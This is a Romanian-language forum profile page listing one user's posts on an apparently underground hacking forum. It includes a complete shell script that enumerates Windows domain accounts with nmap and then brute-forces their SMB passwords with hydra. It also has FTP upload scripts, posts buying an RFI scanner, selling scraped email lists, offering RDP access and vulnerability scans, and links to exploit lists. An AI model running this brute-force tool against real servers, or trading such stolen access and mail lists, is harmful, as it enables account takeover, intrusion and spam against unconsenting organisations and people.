Jump to content

PuRiCeL

Active Members
  • Posts

    121
  • Joined

  • Last visited

Everything posted by PuRiCeL

  1. vreau si eu, cumpar domeniu in functie de site. ai pm.
  2. ResursePhotoShop Downland resurse phtoshop! Down Land . Vrei sa faci bani cu forumu asta?!
  3. vreau si eu cont/invitatie . ms anticipat.
  4. PuRiCeL

    cumpar rfi

    solid.go.ro/poze/rf.pl solid.go.ro/poze/scanner.txt astept banii.
  5. PuRiCeL

    O problema

    ai incercat sa opresti procesu si sa il pornesti iar?
  6. #!/bin/sh echo echo "*******************************************************" echo "* *" echo "* Welcome to the Domain Account Bruteforce Tool. *" echo "* By Sean gambles 21st Sep 2010 *" echo "*******************************************************" echo echo "This tool makes use of the nmap smb-enum-users script," echo "by basically exporting the results, in a cleaned up form" echo "into hydra for bruteforcing." echo echo "Currently, only working with server 2000, 2003 family." echo "This is due to server 2008 not allowing unauthenticated" echo "account enumeration." echo echo "*** Please observe account lockout thresholds before" echo "submitting your password file into this tool, as there" echo "is no protection against lockouts taking place. ***" echo echo "Please enter the target server IP :" read target echo "Please enter the path to your password file" echo "E.g /root/passwords.txt" read passfile echo "Enumerating users, please wait...." nmap -p139,445 -n $target --script=smb-enum-users >/root/nmap-users.txt #Cleans up the user list file by removing template accounts and computer names. cat /root/nmap-users.txt |grep -v \\"$" | grep -v Tmpl |grep RID |cut -d "\\" -f2 |cut -d"(" -f1 |sed 's/.$//' >users.txt rm /root/nmap-users.txt echo "Trying passwords against all the user accounts, please wait...." hydra $target smbnt -s445 -L/root/users.txt -P $passfile -t1 -e n -m D >/root/results.txt rm /root/users.txt echo "*********************************************************" echo echo "Domain accounts found :" echo cat results.txt |grep login: |cut -d" " -f6-11
  7. Vand mailuri diferite tari: US UK Eu(trase de pe site-uri .eu) fr it es de Preturile variaza in functie de cati MB vreti sa cumparati acesta fiind negociabil. Revin si cu alte tari in scurt timp. Pot trage mailuri si la comanda. De asemenea vand lista de nologine destul de ieftin. aproximativ 70k nologine.
  8. aiurila da-mi pm cu id-u tau, iti dau eu cateva rdp-uri .
  9. Connect to FTP HOST and Send File Script 1 #!/bin/sh -vx # # Script to FTP data to server # Paramters: host FTP Server # user FTP Username # passwd FTP Password # file File to send/put ############################## # Variables HOST=$1 USER=$2 PASSWD=$3 FILE=$4 TONAME=$5 # Connect to FTP HOST and Send File ftp -n $HOST <<END_SCRIPT quote USER $USER quote PASS $PASSWD dir ascii put $FILE $TONAME dir quit END_SCRIPT exit 0 Usage: ./ftp1.sh <host> <username> <passwd> <filename> <toname> Script 2 #!/bin/bash clear echo "[+] - - - - - - - - - - - - - - - - - - - - - - - [+]" echo "[+] irc.[***].com [+]" echo "[+] #PUB - Channel [+]" echo "[+] Usage: ./ftp.sh ftp.TV.nL users pass arhive [+]" echo "[+] - - - - - - - - - - - - - - - - - - - - - - - [+]" ftp -inv $1<<ENDFTP user $2 $3 put $4 bye ENDFTP echo "[+] Gata [+]" echo "[+] uter [+]" usage: ./ftp.sh <host> <user> <pass> <arhiva> Download: [+] Script 1 - http://tevad.do.am/ftp1.sh [+] Script 2 - http://tevad.do.am/ftp.sh
  10. tot un bash folosesc si eu , oricum e tare ce a facut si pax.
  11. iti dau eu sniff si rkhunter , da-mi un add pe i****l !
  12. Daca are cgi in el prinzi mult mai multe decat cu prostia aia de perl bot. wind ti-am dat add pe mess, dar nu prea esti online, ce draci de id mi-ai dat? Revin cu o oferta pentru tine, iti dau scan cu vuln pentru acwuser .Prinde exact ca e107 asta al tau .
  13. ofer 50 euro, se poate o demonstratie cu teamview ?
  14. imediat iti dau add. cum ai de gand sa faci plata ?
  15. Wu, Lr , Mandat Online , as putea sa accept si paypal pentru comenzi de minim 100 euro. edit: sau predare personala in bucuresti.
  16. Orice game card este la jumatate de pret, contul steam la fel.
  17. Vand GameCard-uri wow 30/60 zile, conturi steam (+- cd key, in functie de preferinte). Pm pentru alte informatii.
  18. o minunatie de exploit, merge perfect ! +1
  19. [*] http://psychologic.by.ru/exploit/BUGS.LST [*] inca o lista, daca aveti mai postati si voi
×
×
  • Create New...